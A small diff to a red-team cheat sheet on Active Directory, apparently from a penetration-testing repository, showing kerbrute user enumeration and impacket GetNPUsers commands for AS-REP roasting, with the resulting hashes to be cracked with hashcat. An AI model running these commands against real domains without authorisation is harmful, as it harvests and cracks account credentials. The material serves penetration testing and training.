lw8192/Red-Team-Rising/CheatSheets/ActiveDirectory.md

     ./kerbrute userenum userlist.txt -d [name] --dc [name]

-Get a list of valid users: ASREProasting to see if any of them do not have pre-auth set.
+Get a list of valid users: ASREProasting to see if any of them do not have pre-auth set and can request a Kerberos ticket without a password.
 Crack hashes with hashcat

     python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py domain.local/ -no-pass -usersfile users.txt